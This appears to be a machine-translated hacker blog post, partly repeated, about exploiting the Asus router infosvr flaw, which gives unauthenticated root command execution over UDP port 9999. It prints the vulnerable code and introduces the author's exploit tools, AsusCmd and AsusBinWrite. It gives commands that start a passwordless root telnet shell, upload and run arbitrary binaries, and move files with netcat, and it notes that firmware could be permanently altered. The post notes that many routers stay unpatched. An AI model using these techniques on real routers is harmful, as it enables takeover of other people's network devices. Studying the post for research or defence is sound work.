We exploit root-vulnerability in Asus routers
In early 2015, Asus fixed the most critical vulnerability in its routers. The “hole” was in the service called infosvr , used by Asus utilities to facilitate the configuration of the router by automatically detecting it in the local network. The vulnerability allowed to execute any commands with root rights (after all, infosvr is also root ), which gave the attacker complete control over the system.
But Asus has released the corrected firmware. Now it's all in the past. Or not? Hmm ... And how often do ordinary people update the firmware on their routers?
')
I ask under the cat for details, history of discovery, research, instructions and ... exploits.
The infosvr service listens on port 9999 ( UDP ). When a packet of at least 512 bytes arrives, it analyzes it and, depending on its type, performs the appropriate response actions. For example, it collects information about some settings of the router and sends it to Device Discovery, which helps to find the IP address of the router. But there is also this type of package, which implies the execution of a system command by a router. It was then that Asus'ovtsy screwed up. Due to an error in the processing code of such a package, you can execute the command without authorization. This is the line if (memcpy (phdr_ex-> MacAddress, mac, 6) == 0) in the following listing (nonessential lines are deleted):
Probably, memcmp was supposed to be there instead of memcpy (this is what happens when you copy lines of code, with a view to correct it a little later), and instead of == it was assumed! =. But even if this error were not, all the same for penetration it would be enough to know the MAC address .
After successful "authentication" the command from the package will be executed:
Are the scales impressive? In fact, everything was not so bad (and now, when the “hole” was closed, it is generally good). The fact is that infosvr works with the interface br0 , i.e. with a bridge between other interfaces. In case the router is operating in IP Sharing mode (Shared IP mode), br0 combines eth0 and wlan0 . Note that eth1 (which is WAN ) is not included here. Those. already pleased that no one crawls through the external network. But when the router is in Access point mode, then br0 unites all interfaces ...
Somehow I wanted to steer my router via UART , that is, through a hardware console. “Why such difficulties? Come on telnet. ”- you say. Not here it was! This is the RT-N10E! (Aka RT-N10LX).
I will not tell much here how much this shitty router. Who faced - knows. And for the lucky ones who didn’t have to bother with him, I’ll say that Asus RT-xxxE (or RT-xxxLX) routers have a Realtek processor, for which there are no alternative firmware! Although the community is trying . On the official firmware, I used PPTP a couple of years ago. Constant hangs, breaks and other joys. At first, PPPoE did not go up at all (in some firmware they fixed it). Now this router works simply as a bridge between WiFi and Ethernet.
So, connect to the UART.
Turn on. See the download process. (: By the way, you won’t see it through telnet. That's it!)
After the download was completed, I began to investigate the system: software versions, hardware, and other information that can be obtained using the console. But more about that later.
It is interesting to see the reaction to the standard user actions, such as: pressing the WPS button, setting through the web-muzzle, using Asus Utility ... Indeed, the corresponding information appeared on the console. Separately, it is worth mentioning the following fact: when trying to open the web interface httpd (presumably), it writes to / dev / console (/ dev / ttyS0) a login and password to enter!
Of the entire Asus Utility package (Device Discovery, Router Setup Wizard and Firmware Restoration), only the Router Setup Wizard triggered a console response. Namely: when you start the application and click on the "Next" button, the following lines appear:
Hmm ...
These commands Router Setup Wizard sends? I looked through Wireshark - yes, these commands are transmitted in UDP packets with RSW. And what if they are replaced by their own?
Before you start poking around in the packages, I decided to google it. And googled something ( one and two ). The second link provides a detailed description of the vulnerability and a simple exploit for Linux (available in python).
I would like to have such a program under Windows, since I use it 95% of the time. I don't want to load a virtual machine with Ubuntu for the sake of executing some command.
In the process of writing and debugging the exploit, as well as digging in the source code of infosvr, the “parameters” of this “hole” were discovered.
Namely, its size. They are:
The size of the receive and send buffers is 420 bytes each. And everything would be nice, but in reality a 420 byte router can only send in response. But with the reception of the case is even worse. The fact is that after receiving the command, infosvr cuts it to 256 characters and only then does it. But this is not the last limitation. When executing a command that is slightly less than 256 characters long, infosvr crashes with a segmentation fault. The command is completed, but there will be no answer, no opportunity to perform something else. Experienced was found the maximum safe length of the user command. This is 238 characters. So, the dimensions of the "hole": 238 - the team, 420 - the answer.
Exploit written and debugged. You can use .
But it’s not very convenient to steer the router. And, if in this case the limit of 238 characters of the command is not very noticeable, then the limit on the output of the answer of 420 characters is already sadder. But there is a solution! Although the router and strongly limited busybox , but there still is telnetd ! It is better to run it on a non-standard port, since there is no protection: no password is required to connect.
Fine. Is the topic exhausted? Somehow not so.
So, we can use all available commands. We can create and delete files in directories available for writing (ramfs / var ). You can write a long text file with several commands. But not only text! After all, echo in Linux can convert text to binary data! This means that we can upload our programs to the router, which we lack!
The idea is simple:
But it is in words, everything is easy and simple. In practice, we are dealing with a couple of unpleasant factors:
With the restriction on the effective length of the command, everything is clear: you just have to send more packets. Bad in this case is that the transmission speed suffers. After all, the router processor has to handle many small packets. Those. The transfer speed is directly proportional to the speed of the router's processor. (Tested with cpuload : while the AsusBinWrite CPU is running, the router is loaded 100%).
UDP is more complicated. We must somehow control the correctness of the transfer. The primitive way - simply appending the next bytes to the end of the file - does not fit. If one package on the way to the router is lost or duplicated, the file is already defective. Therefore, it was decided to first write the individual parts into different files and check their contents. And then they can be combined. And yet: it should not be combined at the very end, but after a certain number of transferred parts. Because one part takes up space in the memory not, say, 40 bytes (the size of the file-part), but all 4 KB (page). And if parts of a thousand? No RAM is enough (RT-N10E is only 16MB). After a successful merge (success is also checked on the basis of an increase in the size of the target file on the router), these parts are deleted. So in a loop we transfer the whole file to the end. It turned out such a protocol of reliable file transfer to the router via UDP.
To better understand the algorithm of the work, I propose to see what happens on / dev / console (/ dev / ttyS0) during the file transfer and compare it with the output of AsusBinWrite itself.
Note to the next spoiler
As you know, in Linux, in order to run the file for execution, you need to set the appropriate permissions for it. The problem is that there is no chmod on the router (remember about the heavily truncated busybox ?). But nothing. Is there a way around this:
Profit!We just downloaded our executable file to the router, and it works! Although wait ... And where did we get it, this file?
First of all, you need to know the architecture of your router's CPU. The easy way does not give all the necessary information:
You can, of course, search the datasheet and find this information in it ... And if it is not available? And if there are different modifications? The surest way is to look at what is already working.
We'll have to somehow get the executable file from the router to analyze it using the file and readelf -h commands .
I did it like this:
The resulting file came out a little more than what lies on the router (some garbage mixed in). But nothing: we are only interested in the beginning of the file - ELF Header.
We transfer the file to the machine with Linux. Now you can see the title:
Now everything is clear: MIPS-1, Big endian.
Here is my script memo (choose a configurator to your taste):
At the make * config step, configure the toolchain.
At the very least, you need to configure the target architecture. Target options ---> Target Architecture and Target Architecture Variant . There is a small catch: you won't find it right away in Target Architecture Variant Mips I. To make it appear there you need to enable the option Build options ---> Show options and packages that are deprecated or obsolete .
You can not configure anything else. And you can still configure a lot of things: include support for C ++ and other languages, static layout (I haven't done anything good with this), choose applets compiled for the target architecture of the applicationbusybox , library versions, etc.
After setting, select Exit , agree with saving the new configuration and ... make . The build will take a long time, depending on what you have chosen in the settings (I only took a little more than half an hour when setting up the architecture of the target processor). I measured this:ttt = `date`; make; echo $ ttt; date ). Can be compiled in parallel, but not with -jN . The guide reads:
Finally, after xx minutes, the toolchain gathered together completely and without errors. Can be used. GCC for the router will follow the path ./buildroot-2014.11/output/host/usr/bin/mips-linux-gcc (symlink to mips-buildroot-linux-uclibc-gcc ).
First, let's write a primitive program, compile it, fill it in with the router, set the execution permission (the trick shown earlier) and run:
Now you can write your own programs for the router, considering the limited resources and the capabilities of the libraries that are on the router.
But along with the toolchain, some binaries gathered on the target platform! They lie here: ./buildroot-2014 / 11 / output / target/ bin | sbin | usr / bin | usr / sbin . I have tried many of them (inmenuconfig configured to build a variety of additional applications). Those that turned out to be workers and seemed useful saved separately (maybe sometime needed).
Workers were not all. After downloading to the router, many refused to work for various reasons:
And if you have an error like Bus error or unexpected word , then most likely you made a mistake with the choice of the target architecture (or the file is corny).
You, probably, noticed that the speed of file transfer through the “hole” in infosvr , to put it mildly, leaves much to be desired. I wanted to solve this problem by writing TargetSideAgent , which would weigh a little and raise a full TCP connection. Already a bit of code written, as SUDDENLY discovered the netcat wonder utility ! This utility was working among the applications compiled by buildroot for the target platform. Now you don’t have to suffer for a long time - netcat transfers files to the router (and from the router too) almost instantly! For quick transfer, you can now use this approach:
By the way, if for some reason your file transfer with AsusBinWrite was interrupted, you can resume it using the RESUME option :
Now the speed is decent and you can easily upload even “weighty” files. But do not get carried away. Do not forget that / var and / tmp (which is actually / var / tmp ) is the memory of the router. If you score it completely, the router will stop responding (or freeze at all). In this case, you will have to restart it manually. Control free memory with free .
By the way, when I was looking for netcat under Windows, I came across the " 21st century netcat ". It is much richer in functionality than the usual netcat . For our case, the --send-only option turned out to be very useful (to break the connection immediately after the transfer).
I somehow inadvertently redirected something to / dev / mtdblock2 . It is recorded. The router worked. Then, when I decided to restart it - it did not boot. Having looked at what is being issued on UART, I realized that I still damaged the firmware. The router was booted in recovery mode (the Asus Firmware Restoration utility works with this mode).
Without thinking, I launched the same Firmware Restoration and restored the firmware.
The fact of damage to the firmware in a running router, says that using a vulnerability, you can change it. Then the changes on the router will be permanent, and not just until the reboot, as it has been until now.
But I don’t have the time or the desire to research it.
The sources for AsusRouterTools , as well as Windows binaries , can be found in the repository on GitHub.
ZYOnce you have dealt with infosvr , why not use it also for its intended purpose? AsusDiscover is the only thing that will continue to work after installing the firmware with the vulnerability fixed.
PS This is my first publication, so I will be glad to any advice and comments both on the article and on the program code.
PPS A little bit of indignation: Habrahabr should add protection against accidental publication to the article writing interface. Once I pressed Enter - and the Publish button worked. It is necessary to add either some kind of security checkbox, or to ask again before publishing, or to give an opportunity to immediately withdraw the sending to the publication. Yes, and even so much ... You can miss and poke her instead of "Preview". Why not so thought out?
UPD: Together with readers (@ a553), the exploits have fixed bugs that lead to a crash when receiving a response from some routers. Read more in this comment.
But Asus has released the corrected firmware. Now it's all in the past. Or not? Hmm ... And how often do ordinary people update the firmware on their routers?
')
I ask under the cat for details, history of discovery, research, instructions and ... exploits.
What's the matter?
The infosvr service listens on port 9999 ( UDP ). When a packet of at least 512 bytes arrives, it analyzes it and, depending on its type, performs the appropriate response actions. For example, it collects information about some settings of the router and sends it to Device Discovery, which helps to find the IP address of the router. But there is also this type of package, which implies the execution of a system command by a router. It was then that Asus'ovtsy screwed up. Due to an error in the processing code of such a package, you can execute the command without authorization. This is the line if (memcpy (phdr_ex-> MacAddress, mac, 6) == 0) in the following listing (nonessential lines are deleted):
Part of the processPacket function (int sockfd, char * pdubuf) from common.c
if (phdr->OpCode!=NET_CMD_ID_GETINFO && phdr->OpCode!=NET_CMD_ID_GETINFO_MANU) { phdr_ex = (IBOX_COMM_PKT_HDR_EX *)pdubuf; // Check Mac Address if (memcpy(phdr_ex->MacAddress, mac, 6)==0) { _dprintf("Mac Error %2x%2x%2x%2x%2x%2x\n", (unsigned char)phdr_ex->MacAddress[0], (unsigned char)phdr_ex->MacAddress[1], (unsigned char)phdr_ex->MacAddress[2], (unsigned char)phdr_ex->MacAddress[3], (unsigned char)phdr_ex->MacAddress[4], (unsigned char)phdr_ex->MacAddress[5] ); return NULL; } phdr_res->Info = phdr_ex->Info; memcpy(phdr_res->MacAddress, phdr_ex->MacAddress, 6); } Probably, memcmp was supposed to be there instead of memcpy (this is what happens when you copy lines of code, with a view to correct it a little later), and instead of == it was assumed! =. But even if this error were not, all the same for penetration it would be enough to know the MAC address .
After successful "authentication" the command from the package will be executed:
Same function; a little further along the code
switch(phdr->OpCode) { case NET_CMD_ID_MANU_CMD: #define MAXSYSCMD 256 char cmdstr[MAXSYSCMD]; PKT_SYSCMD *syscmd; syscmd = (PKT_SYSCMD *)(pdubuf+sizeof(IBOX_COMM_PKT_HDR_EX)); if (syscmd->len>=MAXSYSCMD) syscmd->len=MAXSYSCMD; syscmd->cmd[syscmd->len]=0; syscmd->len=strlen(syscmd->cmd); fprintf(stderr,"system cmd: %d %s\n", syscmd->len, syscmd->cmd); sprintf(cmdstr, "%s > /tmp/syscmd.out", syscmd->cmd); system(cmdstr); Now, do you want a quest?
- Come here
- Choose any router
- Follow the path Support -> Drivers and Utilities -> OS -> Firmware
- Look for the firmware in the list for January 2015
- In the description for it there is probably a mean phrase " Fixed infosvr security issue. "
- ???
- !!!
Are the scales impressive? In fact, everything was not so bad (and now, when the “hole” was closed, it is generally good). The fact is that infosvr works with the interface br0 , i.e. with a bridge between other interfaces. In case the router is operating in IP Sharing mode (Shared IP mode), br0 combines eth0 and wlan0 . Note that eth1 (which is WAN ) is not included here. Those. already pleased that no one crawls through the external network. But when the router is in Access point mode, then br0 unites all interfaces ...
Detection history
Somehow I wanted to steer my router via UART , that is, through a hardware console. “Why such difficulties? Come on telnet. ”- you say. Not here it was! This is the RT-N10E! (Aka RT-N10LX).
Do you see the telnet switch here? Me neither
I will not tell much here how much this shitty router. Who faced - knows. And for the lucky ones who didn’t have to bother with him, I’ll say that Asus RT-xxxE (or RT-xxxLX) routers have a Realtek processor, for which there are no alternative firmware! Although the community is trying . On the official firmware, I used PPTP a couple of years ago. Constant hangs, breaks and other joys. At first, PPPoE did not go up at all (in some firmware they fixed it). Now this router works simply as a bridge between WiFi and Ethernet.
Learn more about the differences between RT-xxxE and RT-xxxLX
Difference between Asus RT-N10E and Asus RT-N10LXA source
In fact, this is the same router, Asus RT-N10LX has a 2 dBi antenna, RT-N10E - 5 dBi. In the specifications for RT-N10LX, IEEE 802.11d is specified additionally - in essence, it only means that the router takes into account regional legal restrictions in the field of communications, and therefore a weaker antenna is used. Personally, I got a copy (2012 of the assembly) with a small antenna of 2 dBi, while all the markings on the router and the box indicate that this is RT-N10E, and not RT-N10LX. If you look closely at the information on the official website, it says there: “Antenna type will be in accordance with the rules of each country” and also “This model sells only in the EU, China, and South America”. As they say, the same eggs, only in profile. The firmware in these two models is the same.
Asus RT-N10E / LX and RT-N12E / LX Difference
In the 12th model, the same processor, but another controller - RTL8192CE, which allows the use of 2 MIMO, providing theoretically up to 300 Mbit / s. The difference between versions RT-N12E and RT-N12LX - in antennas.
Distinction Asus RT-N10E / LX and Asus RT-N10
ASUS also has RT-N10 and RT-N12 routers. And here it is important to understand that these are other devices that are assembled on the basis of Broadcom chips. For RT-N10 and RT-N12 there are alternative firmware enthusiasts, including "from Oleg." Be careful when buying!
So, connect to the UART.
Connect to UART
Turn on. See the download process. (: By the way, you won’t see it through telnet. That's it!)
So loading the router looks through / dev / console (/ dev / ttyS0)
========== SPI =============
SDRAM CLOCK: 156MHZ
- Force into Single IO Mode - | No chipID Sft chipSize blkSize secSize pageSize sdCk opCk chipName |
| 0 ef4016h 0h 400000h 10000h 1000h 100h 104 39 W25Q32 |
- --- RealTek (RTL8196C) at 2012.04.09-16: 54 + 0800 version v1.1f [16bit] (390MHz)
#### return_addr: 0x05010000, root_bin_offset: 0x050dd012
Jump to image start = 0x80500000 ...
decompressing kernel:
Uncompressing Linux ... done, booting the kernel.
done decompressing kernel.
start address: 0x80003600
RTL8192C / RTL8188C driver version 1.6 (2011-07-18)
Probing RTL8186 10/100 NIC-kenel stack size order [2] ...
chip name: 8196C, chip revid: 4
NOT YET
eth0 added. vid = 9 Member port 0x10 ...
eth1 added. vid = 8 Member port 0x1 ...
eth2 added. vid = 9 Member port 0x2 ...
eth3 added. vid = 9 Member port 0x4 ...
eth4 added. vid = 9 Member port 0x8 ...
[peth0] added, mapping to [eth1] ...
init started: BusyBox v1.13.4 (2014-09-18 18:01:50 CST)
## flash.c free apmib ##
Init Start ...
## system / sysconf.c free apmib ##
## flash.c free apmib ##
===== Set parameter for BSMI test =====
Init bridge interface ...
syslog will use 64KB for log (7 rotate, 1 original, 8KB for each)
Init Wlan application ...
## flash.c free apmib ##
## flash.c free apmib ##
Init Firewall Rules ...
No wan ip currently!
Init WAN Interface ...
start_wan: sysop 0 wan_iface eth1 lan_iface br0 wisp_id 0 act_source 1
set_dhcp_client: sysop 0 wan_iface eth1 lan_iface br0 wisp_id 0 act_source 1
start_wan_dhcp_client: iface eth1
No such process
MiniIGD v1.07 (2013.05.21-07: 19 + 0000).
System TZ ENV = GMT-2
Restart networkmap
## system / sysconf.c free apmib ##
start infosvr
router ip = 192.168.1.1
mac addr = 50: 46: 5d: 86: 76: fc
WLAN0_WLAN_DISABLED = 0 ## flash.c free apmib ##
sh: ## flash.c: unknown operand
# Start wanduck!
Start httpd!
# 1: Enable direct rule
SDRAM CLOCK: 156MHZ
- Force into Single IO Mode - | No chipID Sft chipSize blkSize secSize pageSize sdCk opCk chipName |
| 0 ef4016h 0h 400000h 10000h 1000h 100h 104 39 W25Q32 |
- --- RealTek (RTL8196C) at 2012.04.09-16: 54 + 0800 version v1.1f [16bit] (390MHz)
#### return_addr: 0x05010000, root_bin_offset: 0x050dd012
Jump to image start = 0x80500000 ...
decompressing kernel:
Uncompressing Linux ... done, booting the kernel.
done decompressing kernel.
start address: 0x80003600
RTL8192C / RTL8188C driver version 1.6 (2011-07-18)
Probing RTL8186 10/100 NIC-kenel stack size order [2] ...
chip name: 8196C, chip revid: 4
NOT YET
eth0 added. vid = 9 Member port 0x10 ...
eth1 added. vid = 8 Member port 0x1 ...
eth2 added. vid = 9 Member port 0x2 ...
eth3 added. vid = 9 Member port 0x4 ...
eth4 added. vid = 9 Member port 0x8 ...
[peth0] added, mapping to [eth1] ...
init started: BusyBox v1.13.4 (2014-09-18 18:01:50 CST)
## flash.c free apmib ##
Init Start ...
## system / sysconf.c free apmib ##
## flash.c free apmib ##
===== Set parameter for BSMI test =====
Init bridge interface ...
syslog will use 64KB for log (7 rotate, 1 original, 8KB for each)
Init Wlan application ...
## flash.c free apmib ##
## flash.c free apmib ##
Init Firewall Rules ...
No wan ip currently!
Init WAN Interface ...
start_wan: sysop 0 wan_iface eth1 lan_iface br0 wisp_id 0 act_source 1
set_dhcp_client: sysop 0 wan_iface eth1 lan_iface br0 wisp_id 0 act_source 1
start_wan_dhcp_client: iface eth1
No such process
MiniIGD v1.07 (2013.05.21-07: 19 + 0000).
System TZ ENV = GMT-2
Restart networkmap
## system / sysconf.c free apmib ##
start infosvr
router ip = 192.168.1.1
mac addr = 50: 46: 5d: 86: 76: fc
WLAN0_WLAN_DISABLED = 0 ## flash.c free apmib ##
sh: ## flash.c: unknown operand
# Start wanduck!
Start httpd!
# 1: Enable direct rule
After the download was completed, I began to investigate the system: software versions, hardware, and other information that can be obtained using the console. But more about that later.
It is interesting to see the reaction to the standard user actions, such as: pressing the WPS button, setting through the web-muzzle, using Asus Utility ... Indeed, the corresponding information appeared on the console. Separately, it is worth mentioning the following fact: when trying to open the web interface httpd (presumably), it writes to / dev / console (/ dev / ttyS0) a login and password to enter!
UserID: adminTrue, it doesn’t fall on telnet (/ dev / ttyp0).
UserPass: asus-rt
Of the entire Asus Utility package (Device Discovery, Router Setup Wizard and Firmware Restoration), only the Router Setup Wizard triggered a console response. Namely: when you start the application and click on the "Next" button, the following lines appear:
system cmd: 17 nvram get sw_mode
rund: echo 1> /tmp/syscmd.out
2 1
system cmd: 17 nvram get sw_mode
rund: echo 1> /tmp/syscmd.out
2 1
system cmd: 17 nvram get sw_mode
rund: echo 1> /tmp/syscmd.out
2 1
system cmd: 17 nvram get sw_mode
rund: echo 1> /tmp/syscmd.out
2 1
system cmd: 19 nvram get x_Setting
sh: nvram: not found
rund: nvram get x_Setting> /tmp/syscmd.out
0 1
system cmd: 19 nvram get x_Setting
sh: nvram: not found
rund: nvram get x_Setting> /tmp/syscmd.out
0 1
system cmd: 19 nvram get x_Setting
sh: nvram: not found
rund: nvram get x_Setting> /tmp/syscmd.out
0 1
system cmd: 19 nvram get x_Setting
sh: nvram: not found
rund: nvram get x_Setting> /tmp/syscmd.out
0 1
Hmm ...
These commands Router Setup Wizard sends? I looked through Wireshark - yes, these commands are transmitted in UDP packets with RSW. And what if they are replaced by their own?
It turns out I'm not the first
Before you start poking around in the packages, I decided to google it. And googled something ( one and two ). The second link provides a detailed description of the vulnerability and a simple exploit for Linux (available in python).
Bike AsusCmd
I would like to have such a program under Windows, since I use it 95% of the time. I don't want to load a virtual machine with Ubuntu for the sake of executing some command.
Dimensions
In the process of writing and debugging the exploit, as well as digging in the source code of infosvr, the “parameters” of this “hole” were discovered.
Namely, its size. They are:
The size of the receive and send buffers is 420 bytes each. And everything would be nice, but in reality a 420 byte router can only send in response. But with the reception of the case is even worse. The fact is that after receiving the command, infosvr cuts it to 256 characters and only then does it. But this is not the last limitation. When executing a command that is slightly less than 256 characters long, infosvr crashes with a segmentation fault. The command is completed, but there will be no answer, no opportunity to perform something else. Experienced was found the maximum safe length of the user command. This is 238 characters. So, the dimensions of the "hole": 238 - the team, 420 - the answer.
More (with an example)
infosvr causes
There is a complete team:
Where:
By the way, why do you need redirection to /tmp/syscmd.out? And then, what exactly from it is then read into the buffer 420 bytes and the response to the command is sent.
The “marginal safety length” refers specifically to the user command.
Those. with a user command length of 238 characters, the full command length will be 238 + 18 = 256. Maybe it was the developers who wanted to avoid falling off infosvr when they cut the team down to 256 characters? It seems they did not consider strlen ("> /tmp/syscmd.out").
system ("echo" Some text "> / var / myText; cat / var / myText> /tmp/syscmd.out");
There is a complete team:
'echo "Some text"> / var / myText; cat / var / myText> /tmp/syscmd.out'
Where:
'echo "Some text"> / var / myText; cat / var / myText'- a command sent by the user using AsusCmd;
'> /tmp/syscmd.out'- hard-coded in infosvr code.
By the way, why do you need redirection to /tmp/syscmd.out? And then, what exactly from it is then read into the buffer 420 bytes and the response to the command is sent.
The “marginal safety length” refers specifically to the user command.
Those. with a user command length of 238 characters, the full command length will be 238 + 18 = 256. Maybe it was the developers who wanted to avoid falling off infosvr when they cut the team down to 256 characters? It seems they did not consider strlen ("> /tmp/syscmd.out").
Exploit written and debugged. You can use .
Work example
But it’s not very convenient to steer the router. And, if in this case the limit of 238 characters of the command is not very noticeable, then the limit on the output of the answer of 420 characters is already sadder. But there is a solution! Although the router and strongly limited busybox , but there still is telnetd ! It is better to run it on a non-standard port, since there is no protection: no password is required to connect.
AsusCmd.exe "telnetd -l / bin / sh -p777"Well, now another thing! You can fully command with all the amenities, such as the history of commands and addition on Tab. If the telnet has stopped responding, you can restart it without restarting the router. First you need to beat the sh associated with it:
AsusCmd.exe "killall -9 sh"Note that after executing this command, the sh that is associated with / dev / console will also be killed. Now you can run telnetd again.
Fine. Is the topic exhausted? Somehow not so.
Banquet Continuation
So, we can use all available commands. We can create and delete files in directories available for writing (ramfs / var ). You can write a long text file with several commands. But not only text! After all, echo in Linux can convert text to binary data! This means that we can upload our programs to the router, which we lack!
Asusbinwrite
The idea is simple:
- read portion of bytes from the source file
- convert them to a text view, understandable for ' echo -e '
- form a system command
- send to the router
- repeat until we send the entire file
But it is in words, everything is easy and simple. In practice, we are dealing with a couple of unpleasant factors:
- UDP packets that are sometimes lost
- Restriction on the useful length of the system command (238 characters)
With the restriction on the effective length of the command, everything is clear: you just have to send more packets. Bad in this case is that the transmission speed suffers. After all, the router processor has to handle many small packets. Those. The transfer speed is directly proportional to the speed of the router's processor. (Tested with cpuload : while the AsusBinWrite CPU is running, the router is loaded 100%).
UDP is more complicated. We must somehow control the correctness of the transfer. The primitive way - simply appending the next bytes to the end of the file - does not fit. If one package on the way to the router is lost or duplicated, the file is already defective. Therefore, it was decided to first write the individual parts into different files and check their contents. And then they can be combined. And yet: it should not be combined at the very end, but after a certain number of transferred parts. Because one part takes up space in the memory not, say, 40 bytes (the size of the file-part), but all 4 KB (page). And if parts of a thousand? No RAM is enough (RT-N10E is only 16MB). After a successful merge (success is also checked on the basis of an increase in the size of the target file on the router), these parts are deleted. So in a loop we transfer the whole file to the end. It turned out such a protocol of reliable file transfer to the router via UDP.
Example of transferring an executable file
To better understand the algorithm of the work, I propose to see what happens on / dev / console (/ dev / ttyS0) during the file transfer and compare it with the output of AsusBinWrite itself.
AsusBinWrite output (note the packet loss cases)
Start uploading file to 255.255.255.255 ...
Source file: 'Useful \ ldd' Target file: '/ var / ldd'
0.5% 742.4 Bps part 1 (49 B; cmd: 237 ch) 192.168.1.1: OK
1.0% 106.5 Bps part 2 (49 B; cmd: 237 ch) LOST
1.0% 32.7 Bps part 2 (49 B; cmd: 237 ch) 192.168.1.1: OK
1.5% 347.5 Bps part 3 (49 B; cmd: 237 ch) 192.168.1.1: OK
1.9% 159.1 Bps part 4 (49 B; cmd: 237 ch) 192.168.1.1: OK
2.4% 150.3 Bps part 5 (49 B; cmd: 237 ch) שש LOST
2.4% 32.2 Bps part 5 (49 B; cmd: 237 ch) 192.168.1.1: OK
2.9% 376.9 Bps part 6 (49 B; cmd: 237 ch) ש LOST
2.9% 32.6 Bps part 6 (49 B; cmd: 237 ch) 192.168.1.1: OK
3.4% 401.6 Bps part 7 (49 B; cmd: 237 ch) ש 192.168.1.1: OK
3.9% 146.3 Bps part 8 (49 B; cmd: 237 ch) 192.168.1.1: OK
4.4% 102.3 Bps part 9 (49 B; cmd: 237 ch) ש 192.168.1.1: OK
4.8% 150.0 Bps part 10 (48 B; cmd: 235 ch) 192.168.1.1: OK
5.3% 176.5 Bps part 11 (48 B; cmd: 235 ch) 192.168.1.1: OK
5.8% 120.9 Bps part 12 (48 B; cmd: 235 ch) שש 192.168.1.1: OK
6.3% 145.5 Bps part 13 (48 B; cmd: 235 ch) 192.168.1.1: OK
6.8% 144.6 Bps part 14 (48 B; cmd: 235 ch) ש LOST
6.8% 31.7 Bps part 14 (48 B; cmd: 235 ch) 192.168.1.1: OK
7.2% 285.7 Bps part 15 (48 B; cmd: 235 ch) 192.168.1.1: OK
7.7% 147.7 Bps part 16 (48 B; cmd: 235 ch) LOST
7.7% 32.0 Bps part 16 (48 B; cmd: 235 ch) 192.168.1.1: OK
8.2% 333.3 Bps part 17 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
8.7% 146.3 Bps part 18 (48 B; cmd: 235 ch) 192.168.1.1: OK
9.1% 148.1 Bps part 19 (48 B; cmd: 235 ch) 192.168.1.1: OK
9.6% 141.6 Bps part 20 (48 B; cmd: 235 ch) 192.168.1.1: OK
10.1% 145.0 Bps part 21 (48 B; cmd: 235 ch) 192.168.1.1: OK
10.6% 145.5 Bps part 22 (48 B; cmd: 235 ch) 192.168.1.1: OK
11.0% 148.1 Bps part 23 (48 B; cmd: 235 ch) 192.168.1.1: OK
11.5% 145.9 Bps part 24 (48 B; cmd: 235 ch) 192.168.1.1: OK
12.0% 137.5 Bps part 25 (48 B; cmd: 235 ch) 192.168.1.1: OK
12.5% 146.3 Bps part 26 (48 B; cmd: 235 ch) 192.168.1.1: OK
12.9% 151.9 Bps part 27 (48 B; cmd: 235 ch) 192.168.1.1: OK
13.4% 172.0 Bps part 28 (48 B; cmd: 235 ch) 192.168.1.1: OK
13.9% 126.0 Bps part 29 (48 B; cmd: 235 ch) שש 192.168.1.1: OK
14.4% 173.3 Bps part 30 (48 B; cmd: 235 ch) ש LOST
14.4% 31.7 Bps part 30 (48 B; cmd: 235 ch) 192.168.1.1: OK
14.8% 358.2 Bps part 31 (48 B; cmd: 235 ch) 192.168.1.1: OK
15.3% 144.6 Bps part 32 (48 B; cmd: 235 ch) 192.168.1.1: OK
15.8% 149.5 Bps part 33 (48 B; cmd: 235 ch) 192.168.1.1: OK
16.3% 137.1 Bps part 34 (48 B; cmd: 235 ch) 192.168.1.1: OK
16.7% 153.8 Bps part 35 (48 B; cmd: 235 ch) 192.168.1.1: OK
17.2% 138.7 Bps part 36 (48 B; cmd: 235 ch) 192.168.1.1: OK
17.7% 145.5 Bps part 37 (48 B; cmd: 235 ch) 192.168.1.1: OK
18.2% 140.4 Bps part 38 (48 B; cmd: 235 ch) 192.168.1.1: OK
18.7% 154.3 Bps part 39 (48 B; cmd: 235 ch) LOST
18.7% 32.0 Bps part 39 (48 B; cmd: 235 ch) LOST
18.7% 32.0 Bps part 39 (48 B; cmd: 235 ch) LOST
18.7% 31.6 Bps part 39 (48 B; cmd: 235 ch) 192.168.1.1: OK
19.1% 428.6 Bps part 40 (48 B; cmd: 235 ch) 192.168.1.1: OK
19.6% 175.2 Bps part 41 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
20.1% 120.6 Bps part 42 (48 B; cmd: 235 ch) 192.168.1.1: OK
20.6% 146.3 Bps part 43 (48 B; cmd: 235 ch) 192.168.1.1: OK
21.0% 150.0 Bps part 44 (48 B; cmd: 235 ch) שש 192.168.1.1: OK
21.5% 145.0 Bps part 45 (48 B; cmd: 235 ch) שש LOST
21.5% 31.0 Bps part 45 (48 B; cmd: 235 ch) 192.168.1.1: OK
22.0% 363.6 Bps part 46 (48 B; cmd: 235 ch) 192.168.1.1: OK
22.5% 137.9 Bps part 47 (48 B; cmd: 235 ch) 192.168.1.1: OK
22.9% 154.3 Bps part 48 (48 B; cmd: 235 ch) 192.168.1.1: OK
23.4% 145.0 Bps part 49 (48 B; cmd: 235 ch) שש LOST
23.4% 31.9 Bps part 49 (48 B; cmd: 235 ch) 192.168.1.1: OK
23.9% 360.9 Bps part 50 (48 B; cmd: 235 ch) שש LOST
23.9% 31.8 Bps part 50 (48 B; cmd: 235 ch) 192.168.1.1: OK
24.4% 345.3 Bps part 51 (48 B; cmd: 235 ch) 192.168.1.1: OK
24.8% 151.4 Bps part 52 (48 B; cmd: 235 ch) ש LOST
24.8% 31.6 Bps part 52 (48 B; cmd: 235 ch) 192.168.1.1: OK
25.3% 342.9 Bps part 53 (48 B; cmd: 235 ch) 192.168.1.1: OK
25.8% 145.0 Bps part 54 (48 B; cmd: 235 ch) 192.168.1.1: OK
26.3% 151.4 Bps part 55 (48 B; cmd: 235 ch) 192.168.1.1: OK
26.7% 145.5 Bps part 56 (48 B; cmd: 235 ch) 192.168.1.1: OK
27.2% 147.7 Bps part 57 (48 B; cmd: 235 ch) 192.168.1.1: OK
27.7% 143.7 Bps part 58 (48 B; cmd: 235 ch) 192.168.1.1: OK
28.2% 142.9 Bps part 59 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
28.6% 142.9 Bps part 60 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
29.1% 149.1 Bps part 61 (48 B; cmd: 235 ch) 192.168.1.1: OK
29.6% 142.4 Bps part 62 (48 B; cmd: 235 ch) ש 192.168.1.1: OK
30.1% 142.9 Bps part 63 (48 B; cmd: 235 ch) 192.168.1.1: OK
30.6% 145.9 Bps part 64 (48 B; cmd: 235 ch) 192.168.1.1: OK
